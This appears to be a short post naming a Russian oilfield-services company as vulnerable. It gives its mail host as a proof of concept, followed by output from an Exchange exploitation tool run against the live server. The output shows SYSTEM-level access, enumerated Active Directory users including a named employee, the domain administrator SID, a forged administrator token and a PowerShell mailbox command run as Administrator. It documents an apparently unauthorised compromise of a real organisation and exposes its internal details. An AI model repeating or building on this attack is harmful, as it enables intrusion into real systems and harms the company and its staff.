[Russian Oil] g-n-s.ru

[41]

Yet another vulnerable Russian oil company

About: Facilities and services Leading oilfield services company in pipeline services and well drilling support

Site: https://g-n-s.ru/

POC: mail.g-n-s.ru
[+] Exchange Backend Servers: ['mx.gns.local']
[+]     mx.gns.local - version: 15.2.595.8
[+]     mx.gns.local - version_short: Exchange Server 2019 CU5 Mar21SU
[+]     mx.gns.local - user: NT AUTHORITY\СИСТЕМА
[+]     mx.gns.local - sid: S-1-5-18
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 100 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'local.', 'g-n-s.ru'}
[+] Attempting to discover SID via 14 builtin email combinations
[+]     Retrieved LegacyDN: /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userd44d6598
[+]     Identified backend SMTP domain: g-n-s.ru
[+]     Attempting to retrieve SID for /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userd44d6598
[+]     Successfully parsed SID via UserMailbox object: S-1-5-21-4050735197-1907448506-3362732542-500
[+] Attempting to discover SID via 100 enumerated emails
[+]     Retrieved LegacyDN: /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5ef051cd8f96445fbb625dab863c91d2-Dmiitry Akhapkin
[+]     Attempting to retrieve SID for /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5ef051cd8f96445fbb625dab863c91d2-Dmiitry Akhapkin
[+]     Successfully parsed SID via UserMailbox object: S-1-5-21-4050735197-1907448506-3362732542-1613
[+] RID Cycled: S-1-5-21-4050735197-1907448506-3362732542-500
[+] Generated token for [email protected] - S-1-5-21-4050735197-1907448506-3362732542-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBZBZG1pbmlzdHJhdG9yQGctbi1zLnJ1VS1TLTEtNS0yMS00MDUwNzM1MTk3LTE5MDc0NDg1MDYtMzM2MjczMjU0Mi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=
PS> Get-Mailbox
Administrator